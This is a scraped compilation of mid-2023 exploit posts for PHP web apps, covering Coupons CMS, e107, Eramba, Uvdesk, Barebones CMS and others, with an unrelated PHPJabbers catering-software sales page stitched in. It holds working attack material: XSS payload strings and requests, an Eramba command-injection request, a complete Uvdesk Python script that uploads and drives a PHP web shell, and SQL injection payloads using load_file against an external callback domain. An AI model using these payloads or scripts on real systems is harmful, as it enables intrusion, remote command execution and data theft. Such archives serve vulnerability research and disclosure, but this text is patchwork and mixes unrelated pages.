Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

ConverTo Video Downloader and Converter version 1.4.2 suffers from a file download vulnerability.

    ====================================================================================================================================| # Title     : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://codecanyon.net/item/converto-video-downloader-converter/13225966                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file :download.php [+] line 12 readfile ($file);  & line 5 $file = urldecode($_GET['f']);<?php if(isset($_GET['f'])){  $siz = convertToBytes($_GET['sz']);$file = urldecode($_GET['f']);$rand = rand(0,5000);header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header('Content-Length: ' . $siz);header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");  ob_clean(); flush();readfile ($file); }[+] http://localhost/[PATH]/download.php?f= Ev!lGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

ConverTo Video Downloader And Converter 1.4.2 File Download

OXID eShop Enterprise Edition 6.5.0 – 6.5.2 before 6.5.3 allows uploading files with modified headers in the administration area. An attacker can upload a file with a modified header to create a HTTP Response Splitting attack.

CVE-2023-38330: Security-Bulletins — OXID eSales Dokumentation

Cross Site Scripting vulnerability in e107 v.2.3.2 allows a remote attacker to execute arbitrary code via the description function in the SEO project.

**e107 v2.3.2 - Reflected XSS**

**Platform:****PHP**

**Date:****2023-05-23**

  

    # Exploit Title: e107 v2.3.2 - Reflected XSS
    # Date: 11/05/2022
    # Exploit Author: Hubert Wojciechowski
    # Contact Author: hub.woj12345@gmail.com
    # Vendor Homepage: https://e107.org/
    # Software Link: https://e107.org/download
    # Version: 2.3.2
    # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    
    ### XSS Reflected - unauthorized
    
    URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
    Parameters: content
    
    # POC
    Request:
    POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 1126
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    Accept: text/html, */*; q=0.01
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://127.0.0.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    
    content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml
    
    Response:
    HTTP/1.1 200 OK
    Date: Thu, 11 May 2023 19:38:45 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
    X-Powered-By: PHP/7.4.29
    Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 1053
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <p><strong>Lore"/><script>alert(1)</script>bb
    
    ### XSS Reflected - Authorized
    
    URL: http://127.0.0.1/e107/e107_admin/image.php
    Parameters: for
    
    # POC 1
    Request:
    GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
    Host: 127.0.0.1
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Connection: close
    
    Response:
    HTTP/1.1 200 OK
    Date: Thu, 04 May 2023 03:07:35 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
    X-Powered-By: e107
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    ETag: "37f107dbe6a998ecf7b71689627c2a56"
    Content-Length: 12420
    Vary: Accept-Encoding
    X-Frame-Options: SAMEORIGIN
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    <!doctype html>
    <html lang="en">
    <head>
    <title>Media Manager - Admin Area :: hacked">bbbbb</title>
    <meta charset='utf-8' />
    <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
    
    [...]
    <div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
    	        <p>No HTML5 support.</p>
    		</div>
    [...]
    
    # POC 2
    
    URL: http://127.0.0.1/e107/e107_admin/newspost.php
    Parameters: Payload in URL
    
    Request:
    GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
    Host: 127.0.0.1
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
    Connection: close
    
    Response:
    
    
    
    
    HTTP/1.1 200 OK
    Date: Fri, 05 May 2023 06:21:53 GMT
    Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
    X-Powered-By: e107
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    ETag: "d127dd6a44a22e093fed60b83bf36af2"
    Content-Length: 72914
    Vary: Accept-Encoding
    X-Frame-Options: SAMEORIGIN
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    <!doctype html>
    <html lang="en">
    <head>
    <title>News - List - Admin Area :: hacked">bbbbb</title>
    <meta charset='utf-8' />
    <meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
    
    [...]
    <a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
    <script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
    [...]

CVE-2023-36121: OffSec’s Exploit Database Archive

PHPJabbers Catering System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /index.php?controller=pjAdmin&action=pjActionForgot.

Enhance your restaurant website with a smart online catering reservation system!

Version: 1.0

Our PHP-based catering software will add a tasty, well-organized menu to your website and will enable your customers to pre-order exquisite meals and drinks online. You can offer them different kinds of packages for any occasion: breakfast, corporate cocktails, wedding, birthday party, etc. Our online catering management software lets you easily add as many products and categories as you wish, simplify order management, and process payments. Clients only have to make their choice, select their preferred payment method, and wait for their delivery!

**Catering System**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Our online catering reservation system is a great asset for all websites, cafes, restaurants, and other companies offering catering services. Once installed on a website, the catering software allows caterers to create and customize the menu, manage orders and payments, and improve workflows to successfully run their catering business online.

Customize Your Menu

Add unlimited menu items, both food and beverages, write short product descriptions, and upload images to each product. Set multiple sizes and the corresponding prices and assign products to different categories.

Online & Offline Payments

The catering reservation system supports various payment methods. Clients can pay online via PayPal and Authorize.net, or pay offline in cash, by bank transfer and credit card. You can also request other payment gateways.

Add Multiple Categories

Create various product categories for your restaurant menu: starters, platters, drinks, desserts, etc. Personalize each category by adding a title, a short description, and a representative image.

Email & SMS Notifications

Configure and automate different autoresponder messages that will be sent to administrators and clients upon new order, received payment, or order cancellation. Request an API key to enable SMS alerts.

Offer Different Packages

Compile products into catering packages designated for particular private and business events. Select product size and quantity, add price and specify how many people the package is suitable for.

Colorful & Responsive Design

The front-end layout of our online Catering System is mobile-friendly and fits all screen sizes. Admins can switch between 10 color schemes and choose the one that best matches your website branding.

Manage Orders

Check all online orders at a glance, and keep track of same-day bookings and deliveries. You can also add orders from the back-end of the catering booking system and edit reservations, if necessary.

PHP Source Code Customization

Get our Catering System with a Developer License and make your own modifications to the source code. We can also customize the PHP catering software for you upon request. Compare licenses  

SPECIAL OFFER

**Catering System for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Catering System and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Catering System**

**Key Benefits**

Key Features

Script Modifications

Installation Support

Remote Hosting

Payment Gateways

**Pricing**

You can buy the online Catering System either with a Developer, or with a User Licence.  
Want to request a custom modification? Please, contact us and describe what needs to be changed!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our catering software and how the app has improved their online business.

“

Dear PHPJabbers Team, I really appreciate your support. Your restaurant menu and catering booking system are easy to set up and use. They are up to the value for what I have paid. Thanks, will soon buy other scripts.

M. Shehzad

“

I love the catering system by PHP Jabbers. It's easy to install and just as easy for my clients to manage. It integrates beautifully with any site design and their technical support is excellent.

Mikki Barker

“

Great PHP scripts at reasonable prices is only part of the story - when it comes with fantastic technical back-up service you have a winning formula! I would recommend PHPJabbers without hesitation - they have really helped me with all my questions and requests. Well done and thank you!

Richard Wildblood

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Catering System.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Restaurant Booking System**

$79 / $129

**Food Delivery Script**

$79 / $129

**Restaurant Menu Maker**

$39 / $69

**Night Club Booking Software**

$69 / $109

**Appointment Scheduler**

$69 / $129

**Service Booking Script**

$49 / $99

CVE-2023-34869: Catering System (Only $59) | PHPJabbers

Cross Site Scripting vulnerability in Faculty Evaulation System using PHP/MySQLi v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the page parameter.

\# Faculty Evaluation System !\[\](https://hackmd.io/\_uploads/B1KnDvgw2.png) After pressing Set for each option !\[\](https://hackmd.io/\_uploads/r1WcdDgw3.png) stored xss Entering the payload in the bottom box of most projects will trigger -> I will write the details of the affected part at the end \[xss payload\](https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt) \`\`\` <script>alert(1)</script> <img src=1 onerror=alert(1)> <iframe src=javascript:alert(1)> .... \`\`\` !\[\](https://hackmd.io/\_uploads/B1J2Dtlvn.png) !\[\](https://hackmd.io/\_uploads/SyKpwFevh.png) !\[\](https://hackmd.io/\_uploads/ByG2\_Pevn.png) !\[\](https://hackmd.io/\_uploads/Bys\_b\_lP2.png) !\[\](https://hackmd.io/\_uploads/H1ysROxP3.png) More interesting is this payload \`\`\` xss%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\\%3E%3C/|\\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E@gmail.com%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27--%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cimg/id=%22confirm&lpar;%20OPENBUGBOUNTY)%22/alt=%22/%22src=%22/%22onerror=eval(id&%23x29;%3E%27%22%3E%3Cimg%20src=%22http:%20www.openbugbounty.org/images/design/openbugbounty-logo.png%22%3E%20%EF%BF%BC&show;=xss%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\\%3E%3C/|\\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E@gmail.com%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27--%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/s \`\`\` !\[\](https://hackmd.io/\_uploads/HyAyXOeP2.png) Stored xss will cause xss is triggered every time the page is visited Affected vulnerable blocks: \`\`\` On the page http://localhost/eval/, under "Manage Account," if an XSS payload is entered in the "First Name" and "Last Name" fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=, after entering a reflected XSS payload in the "page=" parameter, it can trigger an attack. On the page http://localhost/eval/index.php?page=subject\_list, under the "Manage subject" setting in the "Action" section, if an XSS payload is entered in the "Description" and "Subject" fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=class\_list, under the "Manage class" setting in the "Action" section, if an XSS payload is entered in any of the fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=academic\_list, under the "Manage" setting in the "Action" section, if an XSS payload is entered in the "Year" field, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=questionnaire, under the "Manage" setting in the "Action" section, in the "Question" field at the bottom of the page, if an XSS payload is entered, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=criteria\_list, in the "Criteria" field, if an XSS payload is entered, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=faculty\_list, after clicking "Edit" in the "Action" column, on the page http://localhost/eval/index.php?page=edit\_faculty&id=, under the "Edit Faculty" section, if an XSS payload is entered in the "School ID," "First Name," and "Last Name" fields, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=student\_list, after clicking "Edit" in the "Action" column, on the respective page, in the "School ID," "First Name," and "Last Name" fields, if an XSS payload is entered, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=user\_list, after clicking "Edit" in the "Action" column, on the respective page, in the "First Name" and "Last Name" fields, if an XSS payload is entered, it can trigger stored XSS. \`\`\`

CVE-2023-36118: Faculty Evaluation System - HackMD

Eramba version 3.19.1 suffers from a remote command execution vulnerability.

    # Trovent Security Advisory 2303-01 ######################################Authenticated remote code execution in Eramba#############################################Overview########Advisory ID: TRSA-2303-01Advisory version: 1.0Advisory status: PublicAdvisory URL: https://trovent.io/security-advisory-2303-01Affected product: ErambaAffected version: 3.19.1 (Enterprise and Community edition)Vendor: Eramba Limited, https://www.eramba.orgCredits: Trovent Security GmbH, Sergey MakarovDetailed description####################Eramba is a web application for managing Governance, Risk, and Compliance (GRC).Trovent Security GmbH discovered that the Eramba web application allows remotecode execution for authenticated users.A possible attacker is able to modify the parameter "path" in the URL"https://hostname/settings/download-test-pdf?path=" to execute arbitrarycommands in the context of the user account the application is running in.To see the output of the executed command in the HTTP response, debug mode hasto be enabled.Severity: HighCVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)CVE ID: CVE-2023-36255CWE ID: CWE-94Proof of concept################HTTP request:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP response:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469<!DOCTYPE html><html><head>    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>        Error: The exit status code '127' says something went wrong:stderr: "sh: 1: --dpi: not found"stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever"command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'.    </title>[...]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Solution / Workaround#####################The vendor released a fixed version of Eramba.Fixed in version 3.19.2.History#######2023-03-31: Vulnerability found2023-04-04: Vendor contacted2023-04-17: Vendor confirmed vulnerability2023-04-20: Vendor released fixed version2023-05-25: Trovent verified remediation of the vulnerability2023-06-13: CVE ID requested2023-07-28: CVE ID received2023-08-01: Advisory published

Eramba 3.19.1 Remote Command Execution

Uvdesk version 1.1.3 suffers from a remote shell upload vulnerability.

    # Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)# Date: 28/07/2023# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Vendor Homepage: https://www.uvdesk.com# Software Link: https://github.com/uvdesk/community-skeleton# Version: 1.1.3# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"# CVE : CVE-2023-39147# Tested on: Ubuntu 20.04.6import requestsimport argparsedef get_args():    parser = argparse.ArgumentParser()    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')    my_args = parser.parse_args()    return my_argsdef main():    args = get_args()    base_url = args.url    command = args.command    uploaded_file = "shell.php"    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command# Edit your credentials here    login_data = {        "_username": "admin@adm.com",        "_password": "passwd",        "_remember_me": "off"    }    files = {        "name": (None, "pwn"),        "description": (None, "xxt"),        "visibility": (None, "public"),        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")    }    s = requests.session()    # Login    s.post(base_url + "/en/member/login", data=login_data)    # Upload    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)    # Execute command    cmd = s.get(url_cmd)    print(cmd.text)if __name__ == "__main__":    main()

Uvdesk 1.1.3 Shell Upload

The Barebones CMS v2.0.2 is vulnerable to Stored Cross-Site Scripting (XSS) when an authenticated user interacts with certain features on the admin panel.

    # Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
    # Date: 2023-06-03
    # Exploit Author: tmrswrr
    # Vendor Homepage: https://barebonescms.com/
    # Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
    # Version: v2.0.2
    # Tested : https://demo.barebonescms.com/
    
    
    --- Description ---
    
    1) Login admin panel and go to new story : 
    https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
    2) Click edit button and  write your payload in the title field:
    Payload: "><script>alert(1)</script>
    3) After save change and will you see alert button
    
    
    POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
    Host: demo.barebonescms.com
    Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 237
    Origin: https://demo.barebonescms.com
    Dnt: 1
    Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

CVE-2023-36211: OffSec’s Exploit Database Archive

Online Lab Diagnostic Management version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 08/01/2023## Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g## Vendor: https://www.youtube.com/@MayuriK## Software: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can steal all information from the databasevery easily.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: username=-2553' OR 3590=3590-- aPlO&password=y4S!v5f!S4&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=hMRUaqVg'+(selectload_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+''AND (SELECT 2815 FROM (SELECT(SLEEP(15)))TjiG)--NgnE&password=y4S!v5f!S4&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Online-Diagnostic-Lab-Management-1.10)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/07/online-diagnostic-lab-management-v10.html)## Time spend:00:35:00

Tag

#php